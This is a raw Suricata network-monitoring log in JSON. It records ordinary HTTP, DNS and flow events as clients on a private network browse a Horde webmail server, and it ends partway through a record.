{"timestamp":"2020-02-29T00:03:05.785158+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7618}} {"timestamp":"2020-02-29T00:03:07.231023+0000","flow_id":1392564397028430,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34716,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3659},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18958,"tx_id":0}} {"timestamp":"2020-02-29T00:03:07.238381+0000","flow_id":2064146958623533,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48633,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":686,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:07.343781+0000","flow_id":2064146958623533,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48633,"proto":"UDP","dns":{"type":"answer","id":686,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:07.343781+0000","flow_id":2064146958623533,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48633,"proto":"UDP","dns":{"type":"answer","id":686,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:03:07.485303+0000","flow_id":1392564397028430,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5173}} {"timestamp":"2020-02-29T00:03:08.000478+0000","flow_id":2113444573572588,"event_type":"flow","src_ip":"192.168.10.122","src_port":36684,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:58:07.290284+0000","end":"2020-02-28T23:58:07.401752+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:08.000652+0000","flow_id":1007666603637629,"event_type":"flow","src_ip":"192.168.10.81","src_port":52652,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":23,"bytes_toserver":3083,"bytes_toclient":19825,"start":"2020-02-29T00:01:58.211837+0000","end":"2020-02-29T00:02:07.266149+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:03:08.000779+0000","flow_id":1732648478160707,"event_type":"flow","src_ip":"192.168.10.122","src_port":39450,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:58:07.505667+0000","end":"2020-02-28T23:58:07.617342+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:08.941077+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7618},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":39619,"tx_id":0}} {"timestamp":"2020-02-29T00:03:08.950105+0000","flow_id":2220655566946137,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49403,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":63050,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:03:09.000201+0000","event_type":"stats","stats":{"uptime":13841,"capture":{"kernel_packets":132831,"kernel_drops":0},"decoder":{"pkts":132841,"bytes":92119962,"invalid":180,"ipv4":131410,"ipv6":8,"ethernet":132841,"raw":0,"null":0,"sll":0,"tcp":126388,"udp":4828,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099360},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2681,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2697,"synack":2688,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1726,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2201,"failed_udp":107},"tx":{"http":4474,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2278}},"flow_mgr":{"closed_pruned":2653,"new_pruned":15,"est_pruned":2243,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":3,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21751,"memcap_state":0,"memcap_global":0},"http":{"memuse":168043,"memcap":0}}} 
{"timestamp":"2020-02-29T00:03:09.055838+0000","flow_id":2220655566946137,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49403,"proto":"UDP","dns":{"type":"answer","id":63050,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:09.055838+0000","flow_id":2220655566946137,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49403,"proto":"UDP","dns":{"type":"answer","id":63050,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:09.122920+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8171}} {"timestamp":"2020-02-29T00:03:09.151356+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8171},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":33109,"tx_id":1}} 
{"timestamp":"2020-02-29T00:03:09.190153+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":813}} {"timestamp":"2020-02-29T00:03:09.191876+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":813},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":2235,"tx_id":2}} {"timestamp":"2020-02-29T00:03:09.192187+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/quickfinder.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1159}} 
{"timestamp":"2020-02-29T00:03:09.205894+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/quickfinder.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1159},"app_proto":"http","fileinfo":{"filename":"\/js\/quickfinder.js","state":"CLOSED","stored":false,"size":3277,"tx_id":3}} {"timestamp":"2020-02-29T00:03:09.206216+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/tables.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2119}} {"timestamp":"2020-02-29T00:03:09.242286+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/tables.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2119},"app_proto":"http","fileinfo":{"filename":"\/js\/tables.js","state":"CLOSED","stored":false,"size":6954,"tx_id":4}} 
{"timestamp":"2020-02-29T00:03:09.247875+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108}} {"timestamp":"2020-02-29T00:03:09.249821+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tab.png","state":"CLOSED","stored":false,"size":108,"tx_id":5}} {"timestamp":"2020-02-29T00:03:09.250673+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/add.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":512}} 
{"timestamp":"2020-02-29T00:03:09.250924+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52670,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:03:09.252524+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52670,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-split.png","state":"CLOSED","stored":false,"size":87,"tx_id":0}} {"timestamp":"2020-02-29T00:03:09.252937+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/add.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":512},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/add.png","state":"CLOSED","stored":false,"size":512,"tx_id":6}} {"timestamp":"2020-02-29T00:03:09.253102+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52670,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460}} {"timestamp":"2020-02-29T00:03:09.253546+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52670,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/search.png","state":"CLOSED","stored":false,"size":460,"tx_id":1}} {"timestamp":"2020-02-29T00:03:09.254808+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/nag.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; 
Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":465}} {"timestamp":"2020-02-29T00:03:09.256273+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/nag.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":465},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/nag.png","state":"CLOSED","stored":false,"size":465,"tx_id":7}} {"timestamp":"2020-02-29T00:03:09.257064+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515}} {"timestamp":"2020-02-29T00:03:09.258222+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/plus-sidebar.png","state":"CLOSED","stored":false,"size":515,"tx_id":8}} {"timestamp":"2020-02-29T00:03:09.265133+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227}} {"timestamp":"2020-02-29T00:03:09.267064+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/collapse.png","state":"CLOSED","stored":false,"size":227,"tx_id":9}} {"timestamp":"2020-02-29T00:03:09.268635+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux 
x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220}} {"timestamp":"2020-02-29T00:03:09.270134+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/edit-sidebar-fff.png","state":"CLOSED","stored":false,"size":220,"tx_id":10}} {"timestamp":"2020-02-29T00:03:09.272134+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477}} {"timestamp":"2020-02-29T00:03:09.273149+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/checkbox_on.png","state":"CLOSED","stored":false,"size":477,"tx_id":11}} {"timestamp":"2020-02-29T00:03:09.297306+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52670,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/data.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":386}} {"timestamp":"2020-02-29T00:03:09.317382+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234}} {"timestamp":"2020-02-29T00:03:09.333736+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/expand.png","state":"CLOSED","stored":false,"size":234,"tx_id":12}} {"timestamp":"2020-02-29T00:03:09.334195+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:03:12.486743+0000","flow_id":1392564397028430,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34716,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5173},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21411,"tx_id":1}} {"timestamp":"2020-02-29T00:03:14.258675+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52670,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/data.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
